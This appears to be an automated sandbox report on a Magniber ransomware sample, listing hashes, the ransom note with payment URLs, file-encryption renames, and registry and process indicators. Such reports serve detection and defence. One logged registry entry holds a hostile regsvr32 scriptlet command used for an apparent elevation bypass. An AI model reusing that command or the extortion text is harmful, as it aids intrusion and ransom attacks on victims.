magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
149s
max time network
148s
platform
windows10_x64
resource
win10-en-20211014
submitted
17/11/2021, 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mal1.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://029cfc0002783ee0beltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://029cfc0002783ee0beltalkfzj.jobsbig.cam/eltalkfzj http://029cfc0002783ee0beltalkfzj.boxgas.icu/eltalkfzj http://029cfc0002783ee0beltalkfzj.sixsees.club/eltalkfzj http://029cfc0002783ee0beltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://029cfc0002783ee0beltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://029cfc0002783ee0beltalkfzj.jobsbig.cam/eltalkfzj

http://029cfc0002783ee0beltalkfzj.boxgas.icu/eltalkfzj

http://029cfc0002783ee0beltalkfzj.sixsees.club/eltalkfzj

http://029cfc0002783ee0beltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4140	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4180	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4172	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4164	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4108	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3528	3960	cmd.exe	106
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	612	3960	cmd.exe	106

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConfirmSplit.crw => C:\Users\Admin\Pictures\ConfirmSplit.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RedoApprove.raw => C:\Users\Admin\Pictures\RedoApprove.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RenameCheckpoint.tif => C:\Users\Admin\Pictures\RenameCheckpoint.tif.eltalkfzj	sihost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 2348	2708	mal1.exe	31
PID 2708 set thread context of 2372	2708	mal1.exe	30
PID 2708 set thread context of 2720	2708	mal1.exe	22
PID 2708 set thread context of 3004	2708	mal1.exe	11
PID 2708 set thread context of 3472	2708	mal1.exe	20
PID 2708 set thread context of 3700	2708	mal1.exe	19

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1492	3700	WerFault.exe	19

Modifies Internet Explorer settings 1 TTPs 8 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 25b0743d06c1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command	mal1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-36240 = "001"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\bing.com\NumberOfSubdomain = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "23"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "3057"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\ = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	mal1.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 126111dd58ded701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000000b5645f0a388529cc50c60b12c2c08963bca4dee07fcb23db04211c6b4dabc0bb3ce1697a8bee2b5cb8a21553134bdba29029906ded97f3a2afd	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\www.bing.com\ = "23"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "3057"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 25b0743d06c1d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000cede315a58ba29cd3c1234dd9b43ef78f6ff1eeeefe69b71fddd70c981f4be382dbc6dedf7412553b31ddbb506469b37c9979f46913e6c64737672ccda4bbb2de956b96b4f921cc509ccef91ad59e4212ffda7c88c2f8ce7bd43d5c45d042ada24ce5747d44bc99f5140807e931e61880a4fd116a559c251d46598fb47bdd284ee42ac48f90db7b0d898475a3b343e3412ae08fe8d5cd3c675fdc05e0817a95677d4b12c2f79e233dbf6eff8d53ada76293afd3f30d883de5729f98ed3b2e32ac9a2eb16e42de7835f790316edd2244e6313a7291b6d9add810af03b8e2ed583b7ce1cd173cb2b577241459e769b92956b5969fe45bb1279f4c06bd0e72bf5800e77abdc99f1708ef86d51c0af34ec4a422c8a2c1762a12d136c6170784a20e9b8bc9b5168417d96a71f1a1ee03f56dd57accd5b66028926e52c5d425429904621bfa4915459b84efb76b2034a5bc69321f9a93ea93ab9b5be21590f2c699510809ec1c59edaf7911d92fae9a827effc2f333a4080acfd56666c762df5aae7e55d7b012f4c656f3c7b93394a06456b71507acafac3f73a470f69e4ddcafed3acd213456e92fc	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "652"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "l11l82i"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
636	notepad.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3004	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2708	mal1.exe
2708	mal1.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe
1492	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3004	Explorer.EXE

Suspicious behavior: MapViewOfSection 10 IoCs

pid	Process
2708	mal1.exe
2708	mal1.exe
2708	mal1.exe
2708	mal1.exe
2708	mal1.exe
2708	mal1.exe
4720	MicrosoftEdgeCP.exe
4720	MicrosoftEdgeCP.exe
4720	MicrosoftEdgeCP.exe
4720	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1492	WerFault.exe
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
